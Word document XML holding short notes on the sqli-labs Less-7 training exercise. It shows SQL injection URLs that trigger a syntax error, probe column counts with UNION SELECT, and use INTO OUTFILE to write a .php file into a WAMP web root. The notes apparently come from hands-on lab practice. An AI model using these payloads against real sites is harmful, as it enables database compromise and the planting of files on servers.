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C1" w:rsidRDefault="00EB30A0">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://172.16.19.146:8080/sqli-labs-master/Less-7/?id=1" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00FC47ED" w:rsidRPr="00D35B93">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>http://172.16.19.146:8080/sqli-labs-master/Less-7/?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00122ADE" w:rsidRPr="00122ADE">
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC47ED" w:rsidRDefault="00FC47ED">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFF00"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报错 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFF00"/>
        </w:rPr>
        <w:t>You have an error in your SQL syntax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC47ED" w:rsidRDefault="001C5937">
      <w:r w:rsidRPr="001C5937">
        <w:t>http://192.168.50.128/sqli-labs/Less-7/?id=-1'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001C5937">
        <w:t>))  union</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001C5937">
        <w:t xml:space="preserve"> select 1,2,3,4  and ((''='</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C5937" w:rsidRDefault="001C5937">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C2D19C5" wp14:editId="71A052CB">
            <wp:extent cx="5274310" cy="2377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7" w:rsidRDefault="001C5937">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C5937">
        <w:t>http://192.168.50.128/sqli-labs/Less-7/?id=-1'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001C5937">
        <w:t>))  union</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001C5937">
        <w:t xml:space="preserve"> select 1,2,3 and ((''='</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C5937" w:rsidRDefault="001C5937">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B0F0F5E" wp14:editId="59D886C8">
            <wp:extent cx="5274310" cy="1619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937" w:rsidRDefault="001C5937"/>
    <w:p w:rsidR="001C5937" w:rsidRDefault="00EB30A0">
      <w:r w:rsidRPr="00EB30A0">
        <w:t>http://192.168.50.128/sqli-labs/Less-7/?id=1'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EB30A0">
        <w:t>))  union</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EB30A0">
        <w:t xml:space="preserve"> select 1,user(),3  into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB30A0">
        <w:t>outfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB30A0">
        <w:t xml:space="preserve"> 'C:\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB30A0">
        <w:t>wamp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB30A0">
        <w:t xml:space="preserve">\\www\\te1s2.php' </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB30A0">
        <w:t xml:space="preserve"> d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB30A0" w:rsidRDefault="00EB30A0"/>
    <w:p w:rsidR="00EB30A0" w:rsidRDefault="00EB30A0"/>
    <w:p w:rsidR="00EB30A0" w:rsidRDefault="00EB30A0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BDFFF75" wp14:editId="4163AF21">
            <wp:extent cx="5274310" cy="1687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A0" w:rsidRDefault="00EB30A0"/>
    <w:p w:rsidR="00EB30A0" w:rsidRDefault="00EB30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99A33" wp14:editId="73FE3D1A">
            <wp:extent cx="5274310" cy="2505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2D"/>
    <w:rsid w:val="00122ADE"/>
    <w:rsid w:val="001C5937"/>
    <w:rsid w:val="00E10A2D"/>
    <w:rsid w:val="00EB30A0"/>
    <w:rsid w:val="00FC47ED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AAB0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9331B6ED-27A0-4C78-8553-6B1D1B14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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-05-17T08:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-05-18T01:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>